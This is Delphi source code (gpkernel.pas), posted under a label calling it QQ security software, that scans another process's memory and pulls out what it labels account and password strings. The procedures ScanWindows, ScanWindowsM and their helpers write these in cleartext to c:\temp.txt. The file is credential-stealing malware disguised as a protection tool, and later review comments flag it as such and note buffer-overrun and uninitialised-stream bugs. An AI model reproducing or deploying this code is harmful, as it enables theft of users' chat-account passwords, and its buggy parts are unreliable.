
📄 gpkernel.pas

📁 DEILPHI写的QQ安全软件源码!功能全套,该有的全有了,欢迎交流
     Newmemoryregions[j].MemorySize:=Memoryregions[i].MemorySize;
     inc(j);
    end;

  inc(i);
  end;
//////////////////////////////////////////////
  MemoryRegionsIndex:=j; //  MemoryRegions[MemoryRegionsIndex]is invalid
  for i:=0 to MemoryRegionsIndex-1 do
  begin
  Memoryregions[i].BaseAddress:=Newmemoryregions[i].BaseAddress;
  Memoryregions[i].MemorySize:=NewMemoryregions[i].MemorySize;
  end;
///////////////////////////////////////////////////////////////////////////////

 for i:=0 to MemoryRegionsIndex-1 do
TotalProcess:=TotalProcess+MemoryRegions[i].MemorySize;
NowProcess:=0;
     
end;////end with
end;

//////////////////初次扫描////////////////////////////////
procedure TFirstScanThread(theIndex:integer);
// First-pass scan of another process's memory for theTask[theIndex].
// Despite the "Thread" name this is a plain procedure that runs synchronously
// (the TThread.Execute form is commented out just below).
//
// Visible flow:
//   1. GetMemoryRanges fills MemoryRegions/MemoryRegionsIndex; exit if none.
//   2. Number_Scan + Int64_value: every region is read with ReadProcessMemory
//      at byte offsets 0..7 and compared, 8 bytes at a time, with the parsed
//      scan value.
//   3. String_Scan: every region is read and matched byte by byte against
//      scanvalue.
//   4. VarType=LowLevel_Value: raw region contents are written to
//      MemoryFileStream.
//   Matching addresses are appended to AddressMemStream as 4-byte DWORDs and
//   counted in AttachedNum. ProcessHandle is closed at the end.
//
// NOTE(review): cross-process ReadProcessMemory over every region of a target
// process is the core behaviour here; defenders triaging this unit should treat
// it as a memory scraper regardless of how the package describes itself.
//Procedure TFirstScanThread.Execute;
var
    // Stack buffers used as ReadProcessMemory destinations.
    // $2000 Int64 elements = 64 KiB; $100 bytes = 256 bytes; $10000 bytes = 64 KiB.
    ReadMemory_ArrayInt64: Array[0..$1FFF] of Int64;
    ReadMemory_ArrayStringByte:Array[0..$FF] of Byte;
    AdvancedReadMemory_ArrayByte:Array[0..$FFFF] of Byte;
    AdvancedReadFile_ArrayByte:Array[0..$FFFF] of Byte;
    
var TempLength: DWORD;               // size in bytes of each memory block
    TempSize:DWORD;                 // number of array elements in the buffer
    ActualRead:Dword;
    PhelpSingleDword:^Dword;
    helpsingleDWord1:DWord;  // holds the sign and exponent bits of the original number


    PhelpDoubleint64:^int64;
    helpDoubleint641:int64;  // holds the sign and exponent bits of the original number
    HelpDoubleint642:int64;

    HelpStringLength:Byte;
    chartoFind:integer;

    Time1:Dword;
    Time2:Dword;

    i: integer;
    j: integer;
    k: integer;


    Int64Value: Int64;

    tempAddress:Dword;
    actualwrite:Dword;
    MemoryFileStream:TFileStream;  // low-level memory dump, saved to MemoryFileName
begin
     TheTaskIndex:=theIndex;
with theTask[theTaskIndex] do
begin
GetMemoryRanges(theTaskIndex);
// Nothing to scan: leave silently (the exception that used to be raised is disabled).
if MemoryRegionsIndex=0 then
begin
//Raise Exception.Create(String_Nomemory);
Exit;
end;

// Parse the search value once more to obtain the final data.
if (scanType=Number_Scan) then
begin

    if vartype=Int64_value then
    begin
      // val stores the error position in i; with the raise below commented out
      // a malformed scanvalue is not rejected here.
      val(scanvalue,Int64value,i);
  //    if i>0 then raise Exception.Create(Format(String_InvalidInt64,[scanvalue]));
    end;
    if vartype=String_value then
    begin
      // The 255-character length check is disabled.
  //  if Length(scanvalue)>255 then raise Exception.create(Format(String_InvalidString,[scanvalue]));
    end;

end;//if end;
////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////
   // Reset per-task scan state and rewind the result stream.
   InSearchProcess:=True;
   Searchtimes:=1;
   NowProcess:=0;
   AttachedNum:=0;
   OldScanType:=ScanType;
   OldVarType:=VarType;
   AddressMemStream.Seek(0,soFromBeginning);
///////// The real work starts here //////////
////////////////////////////////////////////////////////////

if ScanType=Number_Scan then
begin
Time1:=GetTickCount;

   if vartype=Int64_value then //int64
   begin
      Time1:=GetTickCount;
      for i:=0 to MemoryRegionsIndex-1 do
      begin
        for k:=0 to 7 do                               // k is the byte misalignment used when assembling the 8-byte value
        begin
        TempLength:=(MemoryRegions[i].MemorySize-k);
        TempSize:=TempLength shr 3;
        // NOTE(review): the read length is the region size minus k, while the
        // destination is a fixed 64 KiB stack array. Whether GetMemoryRanges
        // caps MemorySize to that size is not visible here - confirm.
        if not ReadProcessMemory(processhandle,pointer(MemoryRegions[i].BaseAddress+k),@ReadMemory_Arrayint64,TempLength,actualread) then continue;
          if actualread>0 then
           begin
           // Only whole 8-byte elements that were actually read are compared.
           TempSize:=actualread shr 3;
            for j:=0 to TempSize-1 do
              begin
               if Readmemory_Arrayint64[j]=int64value then
               begin
               inc(AttachedNum);
               // Address of the hit in the target process, stored as a 4-byte DWORD.
               tempAddress:=(MemoryRegions[i].BaseAddress+k)+j*8;
               AddressmemStream.WriteBuffer(tempAddress,Sizeof(tempAddress));
               end;
              end;

           end;
        end;
        inc(NowProcess,MemoryRegions[i].MemorySize);
      end;
    end;  //int64 end

    NowProcess:=totalProcess;
 //   time2:=getTickCount;
    CanUpdateTask:=IDOK;

   end; //Number_Scan end

//text String scan
if scantype=string_scan then
  begin
    time1:=getTickCount;
    helpStringLength:=length(scanvalue);
    for i:=0 to memoryregionsindex-1 do
    begin
      TempLength:=memoryregions[i].MemorySize;
      TempSize:=TempLength;
      // NOTE(review): the destination here is the 256-byte array, but the read
      // length is the full region size. Unless regions are limited to 256 bytes
      // elsewhere (not visible), this writes past the buffer - confirm.
      if not readprocessmemory(processhandle,pointer(Memoryregions[i].BaseAddress),@ReadMemory_ArrayStringByte,Memoryregions[i].MemorySize,actualread) then continue;
      if actualread>helpStringLength then
      begin
        // CharToFind is the 1-based index of the next scanvalue character to match.
        CharToFind:=1;
        TempSize:=actualread;
        for j:=0 to TempSize-1 do
        begin
          if chr(ReadMemory_ArrayStringByte[j])=scanvalue[CharToFind] then
          begin
            inc(charToFind);
            if CharToFind>=Dword(helpStringLength)+1 then //found the string
            begin
            inc(AttachedNum);
            // Record the address of the first character of the match.
            tempAddress:=(MemoryRegions[i].BaseAddress)+j-(helpStringLength-1);
            AddressmemStream.WriteBuffer(tempAddress,Sizeof(tempAddress));
            CharToFind:=1;
            end;
          end else CharToFind:=1;
        end;
      end;
        inc(NowProcess,MemoryRegions[i].MemorySize);
    end;
    NowProcess:=totalProcess;
  //  time2:=getTickCount;
      CanUpdateTask:=IDOK;
end;

// Low-level scan initialisation (stores address ranges now; concrete addresses are stored later).
//if (scantype<>Number_scan) and (scantype<>String_scan) then
if (VarType=LowLevel_Value) then
begin
   try
   // NOTE(review): the TFileStream.Create call is commented out, so the local
   // MemoryFileStream is never assigned in this procedure before it is used.
 //  MemoryFileStream:=TFileStream.Create(MemoryFileName,fmCreate or FmShareDenyNone);
   MemoryFileStream.Seek(0,soFrombeginning);
    for i:=0 to memoryregionsindex-1 do
    begin
      TempLength:=MemoryRegions[i].MemorySize;
      TempSize:=TempLength;
      if not readprocessmemory(processhandle,pointer(Memoryregions[i].BaseAddress),@AdvancedReadMemory_ArrayByte,TempLength,actualread) then continue;
      if actualread>0 then
      begin
      // Dump the bytes read and shrink the region record to what was written.
      ActualWrite:=MemoryFileStream.Write(AdvancedReadMemory_ArrayByte,actualread);
      Memoryregions[i].MemorySize:=ActualWrite;
      AdvancedAddressMemStream.WriteBuffer(Memoryregions[i],Sizeof(Memoryregions[i]));
      end;
        inc(NowProcess,MemoryRegions[i].MemorySize);
    end;
      NowProcess:=totalProcess;
      CanUpdateTask:=IDOK;

    finally
    SetProcessWorkingSetSize(GetCurrentProcess, $FFFFFFFF, $FFFFFFFF);  // trim this process's working set
    end;
end;

InSearchProcess:=False;
closehandle(ProcessHandle);
end;//with scan end;

end;
//////////////////////////////////////////////////////////////////////////////////////////
//////读取某一进程256字节的指定内容///////////////////////////////////////////////////////
Function ReadMemory_Array(theProcessID,StartAddress:DWORD):boolean;
// Reads 256 consecutive bytes, one ReadProcessMemory call per byte, from
// process theProcessID starting at StartAddress into MemReadData[1..256]
// (declared outside this function).
// Returns False only when the process cannot be opened; individual read
// failures leave -999 in the corresponding slot and still return True.
//
// NOTE(review): the handle is requested with PROCESS_ALL_ACCESS. A process
// opening another process with that mask and then calling ReadProcessMemory is
// an observable signal for endpoint monitoring.
var k:integer;
    thehandle:Thandle;
    ReadByte:Byte;
    ActualRead:Dword;
begin
Result:=True;
thehandle:=OpenProcess(PROCESS_ALL_ACCESS,False,theProcessID);
if thehandle<>0 then
begin

for k:=1 to 256 do
begin
MemReadData[k]:=-999; // sentinel: this byte could not be read
ActualRead:=0;
  if ReadProcessMemory(theHandle,Pointer((StartAddress+k-1)),Addr(ReadByte),1,Actualread)then
  begin
    if  (Actualread=1) then  MemReadData[k]:=ReadByte;
  end ;
end;

end else Result:=False;
// NOTE(review): CloseHandle is also reached when OpenProcess returned 0.
Closehandle(thehandle);
end;
/////////////////////////////////////////////////////
Function ReadMemory(theProcessID,StartAddress:Dword;ValueAddressPointer:Pointer;ValueType:Integer):boolean;
// Reads one value from process theProcessID at StartAddress into the caller's
// buffer ValueAddressPointer. The number of bytes read depends on ValueType:
// 8 for Int64_value, 50 for String_Value, 1 for anything else.
// Returns the ReadProcessMemory result, or False if the process cannot be opened.
//
// The caller's buffer must hold at least that many bytes; nothing here checks it.
// ActualRead is not compared with ValueLen (the check below is commented out),
// so a short read still reports success.
var thehandle:Thandle;
    ActualRead:Dword;
    ValueLen:integer;
begin
Result:=True;
case ValueType of
Int64_value:ValueLen:=8;
String_Value:ValueLen:=50;
else ValueLen:=1;
end;   ///case end;

// NOTE(review): PROCESS_ALL_ACCESS on a foreign process followed by
// ReadProcessMemory - a behaviour endpoint monitoring can key on.
thehandle:=OpenProcess(PROCESS_ALL_ACCESS,False,theProcessID);
if thehandle<>0 then
begin
Result:=ReadProcessMemory(theHandle,Pointer(StartAddress),ValueAddressPointer,ValueLen,Actualread);
//if Actualread<>ValueLen then MemReadByte:=0; /// mean error
end else Result:=False;
// NOTE(review): CloseHandle is also reached when OpenProcess returned 0.
Closehandle(thehandle);

end;


////////将搜索到的数值加入列表(USER)////////////////////
Procedure AddFoundToListView(theIndex:integer);
// Post-processes the addresses found for theTask[theIndex] (the "user" variant).
// Despite the name, no list view is touched in the visible code: for up to the
// first 5 stored addresses it reads 50 bytes from the target process, builds a
// string from bytes 41..50, and if IsNumeric accepts it stores it in User
// (declared outside this procedure). It then appends a line labelled
// '账号' ("account") followed by User to c:\temp.txt.
//
// NOTE(review): a value lifted out of another process's memory is persisted in
// cleartext at a fixed path. When triaging, treat this as credential-harvesting
// behaviour; the fixed path and the label string are usable indicators.
var BufSize:Int64;
    AddressBuf:Dword;
    i,j:Integer;
    TempStringBYTE:Array[1..50] of BYTE;
    Tempstring:string;
    F:TEXTFILE;

    begin
with thetask[theIndex] do
begin
AddressmemStream.Seek(0,soFrombeginning); // for a low-level search BufSize=0
BufSize:= AddressMemStream.Size;
if (BufSize>0) and ( not thetask[theIndex].InSearchProcess) then
begin
// Stream holds 4-byte addresses, so size shr 2 is the number of hits.
BufSize:=BufSize shr 2;
if BufSize>5 then BufSize:=5;  // original comment said "show only the first 3 values"; the cap in code is 5
  For i:=1 to BufSize do
  begin
    try
   AddressMemStream.ReadBuffer(AddressBuf,Sizeof(AddressBuf));
   // Return value is ignored; on failure TempStringBYTE keeps whatever it held.
   GPKernel.Readmemory(ProcessID,AddressBuf,@TempStringBYTE,String_value);
   Tempstring:='';
   // Only the last 10 of the 50 bytes are used; each character goes through
   // TrimRight before being appended.
   for  j:=41 to 50 do
     Tempstring:=Tempstring+TrimRight(chr(TempstringBYTE[j]));
   //   TrimRight(Tempstring);
      ZFPDA:=IsNumeric(Tempstring);
      if ZFPDA=True then
      User:=Tempstring;
   except
    Continue;   // any exception is swallowed and the next address is tried
   end;
  end;//for end
   end;
end;///with end
    // Runs unconditionally, even when no address was processed above.
    begin
     assignfile(F,'c:\temp.txt');
      Append(F);
      try
          writeln(F,'账号',User);
      finally
          closefile(F);
     end;
    end;
end;

 ////////将搜索到的数值加入列表(PASS)////////////////////
Procedure AddFoundToListViewM(theIndex:integer);
// Post-processes the addresses found for theTask[theIndex] (the "pass" variant).
// For up to the first 13 stored addresses it reads 50 bytes from the target
// process, builds a string from bytes 19..40, and if IsValidIdent accepts it
// stores it in Pass (declared outside this procedure). It then appends a line
// labelled '密码' ("password") followed by Pass to c:\temp.txt.
//
// NOTE(review): a value lifted out of another process's memory is written in
// cleartext, under a "password" label, to a fixed path. When triaging, treat
// this as credential-harvesting behaviour; the path and label are usable
// indicators.
var BufSize:Int64;
    AddressBuf:Dword;
    i,j:Integer;
    TempStringBYTE1:Array[1..50] of BYTE;
    Tempstring:string;
    F:TEXTFILE;

begin

with thetask[theIndex] do
begin
AddressmemStream.Seek(0,soFrombeginning); // for a low-level search BufSize=0
BufSize:= AddressMemStream.Size;
if (BufSize>0) and ( not thetask[theIndex].InSearchProcess) then
begin
// Stream holds 4-byte addresses, so size shr 2 is the number of hits.
BufSize:=BufSize shr 2;
if BufSize>13 then BufSize:=13;  // original comment said "show only the first 3 values"; the cap in code is 13
  For i:=1 to BufSize do
  begin
    try
  AddressMemStream.ReadBuffer(AddressBuf,Sizeof(AddressBuf));
  // Return value is ignored; on failure TempStringBYTE1 keeps whatever it held.
  GPKernel.Readmemory(ProcessID,AddressBuf,@TempStringBYTE1,String_value);
   Tempstring:='';
   // Bytes 19..40 of the 50-byte read are used; each character goes through
   // TrimRight before being appended.
   for  j:=19 to 40 do
     Tempstring:=Tempstring+TrimRight(chr(TempstringBYTE1[j]));
      ZFPD:=IsValidIdent(Tempstring);
      if ZFPD=True then
      Pass:=Tempstring;
   except
    Continue;   // any exception is swallowed and the next address is tried
   end;
  end;//for end

end; //if end
   end;

    // Runs unconditionally, even when no address was processed above.
    begin
     assignfile(F,'c:\temp.txt');
      Append(F);
      try
          writeln(F,'密码',Pass);
      finally
          closefile(F);
     end;
    end;
// SetProcessWorkingSetSize(GetCurrentProcess, $FFFFFFFF, $FFFFFFFF);  // trim memory
end;// end of procedure (the original comment said "with end")

//账号搜索//
procedure ScanWindows(theIndex:integer);
// Entry point for the "account" search (per the file's own header comment).
// Configures theTask[CurrentTaskIndex], runs the first scan if none has been
// done yet (SearchTimes=0), then hands the hits to AddFoundToListView.
//
// NOTE(review): the theIndex parameter is never used; everything operates on
// the CurrentTaskIndex variable declared outside this procedure.
 begin
  //StopHookKeyMouse;
     with theTask[CurrenttaskIndex] do
     begin
  ScanType:=GetScanTypeAndTempVar(TextName,CurrentTaskIndex);
  // Meaning of VarType 7 is not shown in this part of the file.
  theTask[CurrentTaskIndex].VarType:=7;
if SearchTimes=0 then
begin
//TFirstScanThread.Create(CurrentTaskIndex);
 // Called synchronously; the threaded form above is disabled.
 TFirstScanThread(CurrentTaskIndex);
 end;
 end;///with end;
    AddFoundToListView(CurrentTaskIndex);
    CanUpdateTask:=-999;
 end;

//密码搜索//
procedure ScanWindowsM(theIndex:integer);
// Entry point for the "password" search (per the file's own header comment).
// Configures theTask[CurrentTaskIndex], runs the first scan if none has been
// done yet (SearchTimes=0), then hands the hits to AddFoundToListViewM.
//
// NOTE(review): the theIndex parameter is never used; everything operates on
// the CurrentTaskIndex variable declared outside this procedure.
 begin
     with theTask[CurrenttaskIndex] do
     begin
  ScanType:=GetScanTypeAndTempVar(TextNameM,CurrentTaskIndex);
  // Meaning of VarType 4 is not shown in this part of the file.
  theTask[CurrentTaskIndex].VarType:=4;
if SearchTimes=0 then
begin
// Called synchronously.
TFirstScanThread(CurrentTaskIndex);
 end;
 end;///with end;
 AddFoundToListViewM(CurrentTaskIndex);
   CanUpdateTask:=-999;
 end;

end.
